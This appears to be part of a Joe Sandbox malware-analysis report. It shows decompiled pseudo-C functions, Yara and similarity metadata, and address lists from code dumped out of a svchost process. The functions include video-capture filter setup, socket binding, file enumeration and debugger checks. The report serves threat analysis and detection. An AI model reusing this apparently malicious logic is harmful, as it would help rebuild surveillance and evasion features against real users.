                                                            0x22baf533266
                                                            0x22baf533271
                                                            0x22baf533281
                                                            0x22baf533289
                                                            0x22baf53328f
                                                            0x22baf533296
                                                            0x22baf53329f
                                                            0x22baf5332a5
                                                            0x22baf5332a9
                                                            0x22baf5332b0
                                                            0x22baf5332b4
                                                            0x22baf5332bb
                                                            0x22baf5332c7
                                                            0x22baf5332ed
                                                            0x22baf5332f6
                                                            0x22baf5332f8
                                                            0x22baf5332fd
                                                            0x22baf53330d
                                                            0x22baf533312
                                                            0x22baf53331c
                                                            0x22baf533322
                                                            0x22baf533328
                                                            0x22baf53332e
                                                            0x22baf533334
                                                            0x22baf533337
                                                            0x22baf53333b
                                                            0x22baf533342
                                                            0x22baf533347
                                                            0x22baf53334a
                                                            0x22baf533358
                                                            0x22baf533365
                                                            0x22baf533371
                                                            0x22baf53337a
                                                            0x22baf53337d
                                                            0x22baf533387
                                                            0x22baf533393
                                                            0x22baf5333a0
                                                            0x22baf5333b6
                                                            0x22baf5333c4
                                                            0x22baf5333d4
                                                            0x22baf5333dc
                                                            0x22baf5333e4
                                                            0x22baf5333e9
                                                            0x22baf5333ec
                                                            0x22baf5333f4
                                                            0x22baf5333f9
                                                            0x22baf5333fc
                                                            0x22baf533404
                                                            0x22baf533409
                                                            0x22baf53343a

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeTask$CreateInstance
                                                            • String ID: Capture Filter$Grabber$vids
                                                            • API String ID: 2903366249-3946229282
                                                            • Opcode ID: febae47382ffe08a65e1b0f9a9c6461848ddf1d42ecf9496556d0baa52ec3c19
                                                            • Instruction ID: a1140f5477c5a7824c97ce6b34a1ff9b51de16111b1d738a3d0c42319f03a55d
                                                            • Opcode Fuzzy Hash: febae47382ffe08a65e1b0f9a9c6461848ddf1d42ecf9496556d0baa52ec3c19
                                                            • Instruction Fuzzy Hash: A5E12637314B85A2EB65CFAAE49829DB7B0FB88B84F049116DB4E47B25DF3AC455C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E0000022B22BAF53EBF0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, void* __r10) {
                                                            				void* _t49;
                                                            				void* _t56;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				void* _t69;
                                                            				signed long long _t81;
                                                            				long long* _t83;
                                                            				intOrPtr* _t86;
                                                            				void* _t94;
                                                            				void* _t95;
                                                            				intOrPtr* _t101;
                                                            				long long _t102;
                                                            				CHAR* _t107;
                                                            				void* _t108;
                                                            				void* _t110;
                                                            				signed long long _t111;
                                                            				void* _t113;
                                                            				void* _t116;
                                                            
                                                            				_t116 = __r9;
                                                            				_t102 = __rdi;
                                                            				 *((long long*)(_t110 + 0x18)) = __rsi;
                                                            				_t108 = _t110 - 0x60;
                                                            				_t111 = _t110 - 0x160;
                                                            				_t81 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t108 + 0x58) = _t81 ^ _t111;
                                                            				_t83 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				if ( *((intOrPtr*)(_t83 + 0xd0)) <= 0) goto 0xaf53edc5;
                                                            				if ( *((intOrPtr*)(_t83 + 0xd4)) <= 0) goto 0xaf53edc5;
                                                            				 *((long long*)(_t111 + 0x170)) = __rbx;
                                                            				GetModuleHandleA(_t107);
                                                            				_t86 = _t83;
                                                            				if (_t83 == 0) goto 0xaf53edbd;
                                                            				r8d = 0x114;
                                                            				E0000022B22BAF563830(_t49, 0, _t56, _t59, _t111 + 0x20, __rdx, __rdi, _t113);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t83 == 0) goto 0xaf53edbd;
                                                            				if ( *_t83() != 0) goto 0xaf53edbd;
                                                            				if ( *_t86 != 0x5a4d) goto 0xaf53edbd;
                                                            				_t101 =  *((intOrPtr*)(_t86 + 0x3c)) + _t86;
                                                            				if ( *_t101 != 0x4550) goto 0xaf53edbd;
                                                            				r8d =  *(_t101 + 6) & 0x0000ffff;
                                                            				_t94 = _t101 + 0x18 + _t83;
                                                            				if (r8d == 0) goto 0xaf53edbd;
                                                            				if (( *(_t94 + 0x24) & 0x20000000) != 0) goto 0xaf53ece9;
                                                            				_t95 = _t94 + 0x28;
                                                            				_t69 = 1 - r8d;
                                                            				if (_t69 < 0) goto 0xaf53ecd0;
                                                            				goto 0xaf53edbd;
                                                            				r9d =  *((intOrPtr*)(_t95 + 0xc));
                                                            				if (_t69 == 0) goto 0xaf53edbd;
                                                            				if ( *((intOrPtr*)(_t95 + 0x10)) == 0) goto 0xaf53edbd;
                                                            				if ( *((intOrPtr*)(_t111 + 0x24)) != 0xa) goto 0xaf53eede;
                                                            				if ( *((intOrPtr*)(_t111 + 0x28)) != 0) goto 0xaf53edbd;
                                                            				if ( *((intOrPtr*)(_t111 + 0x2c)) - 0x3fab <= 0) goto 0xaf53ee11;
                                                            				 *((long long*)(_t111 + 0x178)) = _t102;
                                                            				 *((intOrPtr*)(_t108 + 0x40)) = 0x8d443374;
                                                            				 *((short*)(_t108 + 0x44)) = 0x943;
                                                            				_t120 =  <  ? _t108 + 0x40 : _t108 + 0x50;
                                                            				 *((intOrPtr*)(_t108 + 0x50)) = 0x8d442e74;
                                                            				 *((short*)(_t108 + 0x54)) = 0x943;
                                                            				_t58 =  <  ? 0x44 : 0x46;
                                                            				r10d = 0;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t114 =  <  ? _t108 + 0x40 : _t108 + 0x50;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if ( *((intOrPtr*)(_t95 + _t116 + _t86)) != ( *( <  ? _t108 + 0x40 : _t108 + 0x50) & 0x000000ff)) goto 0xaf53eda8;
                                                            				if (1 - 6 < 0) goto 0xaf53ed90;
                                                            				if (1 == 6) goto 0xaf53ede2;
                                                            				r10d = r10d + 1;
                                                            				if (r10d - _t101 - 6 <= 0) goto 0xaf53ed80;
                                                            				return E0000022B22BAF55A7C0(_t101 + __r10, _t108 + 0x40,  *(_t108 + 0x58) ^ _t111);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual$AddressHandleModuleProc
                                                            • String ID: RtlGetVersion$ntdll
                                                            • API String ID: 2994196730-2582309562
                                                            • Opcode ID: 450c247e37ff96eeae48f2c88193178de83565a0597657755924ea294ff1c5a9
                                                            • Instruction ID: c077bee93350d562380f2a5f1e0ec8ac25430ac7e3cc6a8202d69ca8d05e21fe
                                                            • Opcode Fuzzy Hash: 450c247e37ff96eeae48f2c88193178de83565a0597657755924ea294ff1c5a9
                                                            • Instruction Fuzzy Hash: 6BB1D433205580EBEB7A8B6AD46C3ECB7E2F745704F588629D60A4378ADF36C949C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E0000022B22BAF56411C(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                            				void* __rdi;
                                                            				void* _t36;
                                                            				int _t40;
                                                            				void* _t45;
                                                            				intOrPtr _t53;
                                                            				signed long long _t63;
                                                            				long long _t66;
                                                            				_Unknown_base(*)()* _t86;
                                                            				void* _t90;
                                                            				void* _t91;
                                                            				void* _t93;
                                                            				signed long long _t94;
                                                            				struct _EXCEPTION_POINTERS* _t100;
                                                            
                                                            				_t46 = __ecx;
                                                            				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                            				_t3 = _t93 - 0x4f0; // -1288
                                                            				_t91 = _t3;
                                                            				_t94 = _t93 - 0x5f0;
                                                            				_t63 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                            				_t53 = r8d;
                                                            				_t45 = __ecx;
                                                            				if (__ecx == 0xffffffff) goto 0xaf56415b;
                                                            				E0000022B22BAF55B59C(_t36);
                                                            				_t5 = _t94 + 0x70; // 0x58
                                                            				r8d = 0x98;
                                                            				E0000022B22BAF563830(__ecx, 0, _t53, __esp, _t5, __rdx, _t86, __r8);
                                                            				_t6 = _t91 + 0x10; // -1272
                                                            				r8d = 0x4d0;
                                                            				E0000022B22BAF563830(_t46, 0, _t53, __esp, _t6, __rdx, _t86, __r8);
                                                            				_t7 = _t94 + 0x70; // 0x58
                                                            				 *((long long*)(_t94 + 0x48)) = _t7;
                                                            				_t10 = _t91 + 0x10; // -1272
                                                            				_t66 = _t10;
                                                            				 *((long long*)(_t94 + 0x50)) = _t66;
                                                            				__imp__RtlCaptureContext();
                                                            				r8d = 0;
                                                            				__imp__RtlLookupFunctionEntry();
                                                            				if (_t66 == 0) goto 0xaf5641ee;
                                                            				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                            				_t16 = _t94 + 0x60; // 0x48
                                                            				 *((long long*)(_t94 + 0x30)) = _t16;
                                                            				_t19 = _t94 + 0x58; // 0x40
                                                            				 *((long long*)(_t94 + 0x28)) = _t19;
                                                            				_t21 = _t91 + 0x10; // -1272
                                                            				 *((long long*)(_t94 + 0x20)) = _t21;
                                                            				__imp__RtlVirtualUnwind();
                                                            				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                            				_t25 = _t91 + 0x508; // 0x0
                                                            				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                            				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
                                                            				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                            				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                            				_t40 = IsDebuggerPresent();
                                                            				SetUnhandledExceptionFilter(_t86, _t90);
                                                            				if (UnhandledExceptionFilter(_t100) != 0) goto 0xaf564250;
                                                            				if (_t40 != 0) goto 0xaf564250;
                                                            				if (_t45 == 0xffffffff) goto 0xaf564250;
                                                            				E0000022B22BAF55B59C(_t42);
                                                            				return E0000022B22BAF55A7C0(_t45,  *((intOrPtr*)(_t91 + 0x508)),  *(_t91 + 0x4e0) ^ _t94);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: d36c0a5996192d56c9e7224c72af95ee14e503dfbf0b640e69a524f858037cc0
                                                            • Instruction ID: 1f1056a4d946cd34fd401dfa5a0f6bacdc931b33f2b9395716fce21e0aa48c26
                                                            • Opcode Fuzzy Hash: d36c0a5996192d56c9e7224c72af95ee14e503dfbf0b640e69a524f858037cc0
                                                            • Instruction Fuzzy Hash: 15316D37214B80A6EB75CFA5E8483DE73A0F788758F540526EA9D43B9AEF39C155CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileFind$CreateFirstHandle
                                                            • String ID: q
                                                            • API String ID: 3283578348-4110462503
                                                            • Opcode ID: 222c2e3c23bc309b49d8a21100b8cfcf10d5dd40de95b5b39dc779dceeb4bac4
                                                            • Instruction ID: e6cf634174bf990b5a731adce6f8a97c55c18644a1cb86527f30077fb207bda8
                                                            • Opcode Fuzzy Hash: 222c2e3c23bc309b49d8a21100b8cfcf10d5dd40de95b5b39dc779dceeb4bac4
                                                            • Instruction Fuzzy Hash: D441B633604B80ABEA318B98F4AC79E73A4F7457A4F510319CAA9477DACF7AC451CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0000022B22BAF558260(void* __ecx, void* __edx, void* __eflags, void* __rcx, void* __rdx, short* __r9) {
                                                            				void* __rbx;
                                                            				intOrPtr _t18;
                                                            				signed int _t26;
                                                            				void* _t27;
                                                            				short _t32;
                                                            				signed long long _t70;
                                                            				signed long long _t71;
                                                            				signed short* _t76;
                                                            				void* _t92;
                                                            				short* _t94;
                                                            				intOrPtr* _t95;
                                                            				signed long long _t96;
                                                            				void* _t97;
                                                            				void* _t98;
                                                            				void* _t105;
                                                            
                                                            				_t98 = _t97 - 0x58;
                                                            				_t96 = _t98 + 0x20;
                                                            				_t70 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t71 = _t70 ^ _t96;
                                                            				 *(_t96 + 0x20) = _t71;
                                                            				_t105 = __rcx;
                                                            				_t95 =  *((intOrPtr*)(_t96 + 0xb0));
                                                            				_t94 = __r9;
                                                            				r15d = r8w & 0xffffffff;
                                                            				_t18 = E0000022B22BAF54FDE0(__rdx);
                                                            				 *_t95 = _t18;
                                                            				if (_t18 == 0) goto 0xaf5582c0;
                                                            				E0000022B22BAF54FED0(r15w & 0xffffffff, __rdx, __rdx, _t95);
                                                            				goto 0xaf5582c5;
                                                            				if (E0000022B22BAF54FF80(r15w & 0xffffffff, __rdx, __rdx, _t95) != 0) goto 0xaf5582d3;
                                                            				goto 0xaf558451;
                                                            				if (_t94 == 0) goto 0xaf558317;
                                                            				if ( *_t94 == 0) goto 0xaf558317;
                                                            				_t76 = _t98 - 0x20 + 0x20;
                                                            				 *_t76 = E0000022B22BAF54FDE0(_t94);
                                                            				if (E0000022B22BAF54FED0(0, _t76, _t94, _t76) != 0) goto 0xaf558317;
                                                            				__imp__#111();
                                                            				goto 0xaf558451;
                                                            				_t26 =  *_t76 & 0x0000ffff;
                                                            				_t7 = _t94 + 1; // 0x1
                                                            				r15d = _t7;
                                                            				if (_t26 == 2) goto 0xaf55837a;
                                                            				if (_t26 == 0x17) goto 0xaf55837a;
                                                            				r12d = 0;
                                                            				r8d = 6;
                                                            				__imp__#23();
                                                            				 *( *(_t96 + 0xa8)) = _t71;
                                                            				if (_t71 == 0xffffffff) goto 0xaf558447;
                                                            				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                            				if (r8d == 0) goto 0xaf55835e;
                                                            				if ( *((intOrPtr*)(__rcx + 0x38)) > 0) goto 0xaf558361;
                                                            				r15d = 0;
                                                            				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                                            				_t27 = E0000022B22BAF5503C0(_t26, r15d);
                                                            				if (_t27 != 0xffffffff) goto 0xaf55838c;
                                                            				goto 0xaf55846e;
                                                            				r12d = r15d;
                                                            				if (_t27 ==  *_t95) goto 0xaf55832f;
                                                            				goto 0xaf558451;
                                                            				if (E0000022B22BAF550450(0x273f,  *((intOrPtr*)(_t105 + 8)), _t76,  *( *(_t96 + 0xa8))) == 0xffffffff) goto 0xaf558479;
                                                            				if (( *(_t96 + 0xa0) & 0x0000ffff) != 0) goto 0xaf5583e4;
                                                            				if (r12d != 0) goto 0xaf5583c9;
                                                            				_t78 =  !=  ? 0xaf598020 : 0xaf598000;
                                                            				r8d = 0x1c;
                                                            				_t92 =  !=  ? 0xaf598020 : 0xaf598000;
                                                            				_t31 =  !=  ? r8d : 0x10;
                                                            				r8d =  !=  ? r8d : 0x10;
                                                            				goto 0xaf558438;
                                                            				if (r12d != 0) goto 0xaf5583ff;
                                                            				_t80 =  !=  ? 0xaf598020 : 0xaf598000;
                                                            				asm("movups xmm0, [ebx]");
                                                            				_t32 =  *((intOrPtr*)(( !=  ? 0xaf598020 : 0xaf598000) + 0x18));
                                                            				asm("movsd xmm1, [ebx+0x10]");
                                                            				asm("movups [ebp], xmm0");
                                                            				 *((intOrPtr*)(_t96 + 0x18)) = _t32;
                                                            				asm("movsd [ebp+0x10], xmm1");
                                                            				__imp__#9();
                                                            				 *((short*)(_t96 + 2)) = _t32;
                                                            				r8d = 0x1c;
                                                            				r8d =  ==  ? 0x10 : r8d;
                                                            				__imp__#2();
                                                            				if (0x10 != 0xffffffff) goto 0xaf55844f;
                                                            				__imp__#111();
                                                            				return E0000022B22BAF55A7C0( *(_t96 + 0xa0) & 0x0000ffff, 0xaf598020,  *(_t96 + 0x20) ^ _t96);
                                                            			}
                                                            0x22baf55826d
                                                            0x22baf558271
                                                            0x22baf558276
                                                            0x22baf55827d
                                                            0x22baf558280
                                                            0x22baf55828b
                                                            0x22baf55828e
                                                            0x22baf558298
                                                            0x22baf55829b
                                                            0x22baf5582a2
                                                            0x22baf5582a7
                                                            0x22baf5582b7
                                                            0x22baf5582b9
                                                            0x22baf5582be
                                                            0x22baf5582c7
                                                            0x22baf5582ce
                                                            0x22baf5582da
                                                            0x22baf5582e0
                                                            0x22baf5582e9
                                                            0x22baf5582fa
                                                            0x22baf55830a
                                                            0x22baf55830c
                                                            0x22baf558312
                                                            0x22baf558317
                                                            0x22baf55831c
                                                            0x22baf55831c
                                                            0x22baf558324
                                                            0x22baf55832a
                                                            0x22baf55832c
                                                            0x22baf558332
                                                            0x22baf55833b
                                                            0x22baf558341
                                                            0x22baf558349
                                                            0x22baf55834f
                                                            0x22baf558356
                                                            0x22baf55835c
                                                            0x22baf55835e
                                                            0x22baf558361
                                                            0x22baf55836b
                                                            0x22baf558373
                                                            0x22baf558375
                                                            0x22baf55837a
                                                            0x22baf558380
                                                            0x22baf558387
                                                            0x22baf55839c
                                                            0x22baf5583ac
                                                            0x22baf5583b1
                                                            0x22baf5583c5
                                                            0x22baf5583cd
                                                            0x22baf5583d8
                                                            0x22baf5583db
                                                            0x22baf5583df
                                                            0x22baf5583e2
                                                            0x22baf5583e7
                                                            0x22baf5583fb
                                                            0x22baf5583ff
                                                            0x22baf558402
                                                            0x22baf558405
                                                            0x22baf55840a
                                                            0x22baf55840e
                                                            0x22baf558411
                                                            0x22baf558416
                                                            0x22baf558425
                                                            0x22baf558429
                                                            0x22baf558434
                                                            0x22baf55843c
                                                            0x22baf558445
                                                            0x22baf558447
                                                            0x22baf55846d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$AddressStringbindhtonssocket
                                                            • String ID:
                                                            • API String ID: 2574939132-0
                                                            • Opcode ID: 826f81d1e7b1d6e00b10998575dee52d1db3e57f385bf2414de993f519146e09
                                                            • Instruction ID: 52319d58bb12e572cde23386e43ad1092847b998ccb1cd0472d7daa7377987d4
                                                            • Opcode Fuzzy Hash: 826f81d1e7b1d6e00b10998575dee52d1db3e57f385bf2414de993f519146e09
                                                            • Instruction Fuzzy Hash: 9251D523200A44E5EB7A9FA5D80D7EC33A5F704B96F498115EE59876DAEF3AC885C301
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception$Throw$FileHeaderRaise
                                                            • String ID:
                                                            • API String ID: 3102897148-0
                                                            • Opcode ID: 5172e8af33684fcba29193f16751249df40b2a00257addb6106f51b62e87130b
                                                            • Instruction ID: 242408c23d01e9d814ffe6cd469aebe7d96c7f2a6164dfe1352255b0e7fa80f7
                                                            • Opcode Fuzzy Hash: 5172e8af33684fcba29193f16751249df40b2a00257addb6106f51b62e87130b
                                                            • Instruction Fuzzy Hash: 1F2165A7710A4099D72DEFB2E85A1EE3312E784BC4F089536BE594BB5BDF35D0118640
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$CloseHandleInitializeObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 3162378676-0
                                                            • Opcode ID: 12ba334856dcd203e75df68d0a5d8bb30e6e794c20654e4eb00e3122ff515e47
                                                            • Instruction ID: 0747033308b97927b923bd0a77ac23baad085cb08d860b4878e7742ad0c651a6
                                                            • Opcode Fuzzy Hash: 12ba334856dcd203e75df68d0a5d8bb30e6e794c20654e4eb00e3122ff515e47
                                                            • Instruction Fuzzy Hash: 3231BF33601B80A2EB69CFA5F54878977A5F788B84F144126EB9D03B69DF39C0A0C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirst$Create
                                                            • String ID: n$q
                                                            • API String ID: 2053571766-1810014004
                                                            • Opcode ID: bdb2fb86379ed65c588ff15d9588b12b90949342f46599e925e8a151b4b1b06a
                                                            • Instruction ID: 2affdd1ed37811a7a2975801f4974d2e02e63c888fa2f9ef2ab7f7edda19d5cf
                                                            • Opcode Fuzzy Hash: bdb2fb86379ed65c588ff15d9588b12b90949342f46599e925e8a151b4b1b06a
                                                            • Instruction Fuzzy Hash: 3C31F823204A84A5EF319B69D0ADBDE3360FB41BA4F545318CB2A077CACF3AC054C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E0000022B22BAF55BA64(long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r8, long long _a8) {
                                                            				void* __rdi;
                                                            				void* _t16;
                                                            				signed short _t17;
                                                            				int _t18;
                                                            				void* _t19;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				intOrPtr* _t41;
                                                            
                                                            				_t40 = __rdx;
                                                            				_a8 = __rbx;
                                                            				_t41 = __rcx;
                                                            				_t2 = _t40 + 0x28; // 0x28
                                                            				r8d = _t2;
                                                            				_t16 = E0000022B22BAF563830(_t19, 0, _t25, _t26, __rcx + __r8, __rdx, __rcx, __r8);
                                                            				 *(_t41 + 0x50) =  *(_t41 + 0x50) & 0x00000000;
                                                            				 *(_t41 + 0x58) =  *(_t41 + 0x58) & 0x00000000;
                                                            				 *(_t41 + 0x5c) =  *(_t41 + 0x5c) & 0x00000000;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t41 + 0x10)) = 0x22baf530000;
                                                            				 *((long long*)(_t41 + 8)) = 0x22baf530000;
                                                            				 *((long long*)(_t41 + 0x20)) = 0xaf57be78;
                                                            				 *_t41 = 0x60;
                                                            				 *((intOrPtr*)(_t41 + 0x18)) = 0xe00;
                                                            				0xaf531990();
                                                            				if (_t16 != 0) goto 0xaf55bafb;
                                                            				_t17 = GetLastError();
                                                            				_t22 =  <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000;
                                                            				_t29 =  <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000;
                                                            				if (( <=  ? _t17 : _t17 & 0x0000ffff | 0x80070000) >= 0) goto 0xaf55bafb;
                                                            				_t18 = IsDebuggerPresent();
                                                            				if (_t18 == 0) goto 0xaf55baf4;
                                                            				OutputDebugStringW(??);
                                                            				 *0xaf599c00 = 1;
                                                            				return _t18;
                                                            			}
                                                            0x22baf55ba64
                                                            0x22baf55ba64
                                                            0x22baf55ba70
                                                            0x22baf55ba73
                                                            0x22baf55ba73
                                                            0x22baf55ba7a
                                                            0x22baf55ba7f
                                                            0x22baf55ba8b
                                                            0x22baf55ba93
                                                            0x22baf55ba97
                                                            0x22baf55ba9a
                                                            0x22baf55baa0
                                                            0x22baf55baab
                                                            0x22baf55baaf
                                                            0x22baf55bab5
                                                            0x22baf55babc
                                                            0x22baf55bac3
                                                            0x22baf55bac5
                                                            0x22baf55bad6
                                                            0x22baf55bad9
                                                            0x22baf55badb
                                                            0x22baf55badd
                                                            0x22baf55bae5
                                                            0x22baf55baee
                                                            0x22baf55baf4
                                                            0x22baf55bb08

                                                            APIs
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000022BAF55BAE7
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 389471666-631824599
                                                            • Opcode ID: f7893e8bb05ce6867ba3fe5fae8ebfecaafd2d519f5aadc1416d0d497b0893cb
                                                            • Instruction ID: 7eb1c47d40e54894353b733e272f45d3ca61bb49aedc440e113c021c505b87e0
                                                            • Opcode Fuzzy Hash: f7893e8bb05ce6867ba3fe5fae8ebfecaafd2d519f5aadc1416d0d497b0893cb
                                                            • Instruction Fuzzy Hash: C7117033210B80B7FB269BA6DA5C3E933A4FB44345F444125C74982A56EF7AD4B4C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 47%
                                                            			E0000022B22BAF544620(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, void* __r9, long long _a8) {
                                                            				long long _v16;
                                                            				char _v24;
                                                            				long long _v32;
                                                            				char _v40;
                                                            				long long _v48;
                                                            				intOrPtr _v56;
                                                            				void* __rdi;
                                                            				int _t33;
                                                            				long long _t51;
                                                            				long long _t60;
                                                            				void* _t61;
                                                            				void* _t65;
                                                            
                                                            				_t65 = __r8;
                                                            				_t51 = __rbx;
                                                            				_t44 = __eflags;
                                                            				_a8 = __rbx;
                                                            				 *((long long*)(__rcx + 8)) = __rdx;
                                                            				 *((long long*)(__rcx)) = 0xaf588cf8;
                                                            				r9d = 0;
                                                            				 *((long long*)(__rdx + 0x68)) = __rcx;
                                                            				_t60 = __rcx;
                                                            				r8d = 0;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				 *((long long*)(__rcx + 0x10)) = 0xaf588cf8;
                                                            				 *((long long*)(__rcx)) = 0xaf589360;
                                                            				E0000022B22BAF5444A0(__eflags, __rbx, __rcx + 0x40, __rcx, _t61);
                                                            				 *((char*)(__rcx + 0x24)) = 2;
                                                            				 *((intOrPtr*)(__rcx + 0x2c)) = 0x20;
                                                            				E0000022B22BAF55A7EC(0xaf589360, __rcx + 0x40);
                                                            				r8d = 0;
                                                            				_t9 = _t65 + 0x20; // 0x20
                                                            				E0000022B22BAF545190(0x1d8, _t9, _t44, _t51, 0xaf589360, _t61);
                                                            				 *((long long*)(_t60 + 0x148)) = 0xaf589360;
                                                            				 *((char*)(_t60 + 0x18)) = 1;
                                                            				 *((long long*)(_t60 + 0x150)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t60 + 0x1c)) = _t51;
                                                            				r8d = 0;
                                                            				_v40 = E0000022B22BAF544D80;
                                                            				 *((intOrPtr*)(_t60 + 0x28)) = 0;
                                                            				_v32 = _t60;
                                                            				_v24 = 1;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				_v48 = _t51;
                                                            				_v16 = E0000022B22BAF544D80;
                                                            				_v56 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, E0000022B22BAF544D80, _t51, 0xaf589360, _t61, 0xaf548af0,  &_v40);
                                                            				WaitForSingleObject(??, ??);
                                                            				_t33 = CloseHandle(??);
                                                            				 *((long long*)(_t60 + 0x30)) = E0000022B22BAF544D80;
                                                            				return _t33;
                                                            			}

                                                            0x22baf544620
                                                            0x22baf544620
                                                            0x22baf544620
                                                            0x22baf544620
                                                            0x22baf54462a
                                                            0x22baf544635
                                                            0x22baf544638
                                                            0x22baf54463b
                                                            0x22baf54463f
                                                            0x22baf544642
                                                            0x22baf54464b
                                                            0x22baf544651
                                                            0x22baf544660
                                                            0x22baf544663
                                                            0x22baf54466d
                                                            0x22baf544671
                                                            0x22baf544678
                                                            0x22baf54467d
                                                            0x22baf544683
                                                            0x22baf544687
                                                            0x22baf54468c
                                                            0x22baf54469f
                                                            0x22baf5446a3
                                                            0x22baf5446aa
                                                            0x22baf5446b4
                                                            0x22baf5446b8
                                                            0x22baf5446bb
                                                            0x22baf5446c2
                                                            0x22baf5446c7
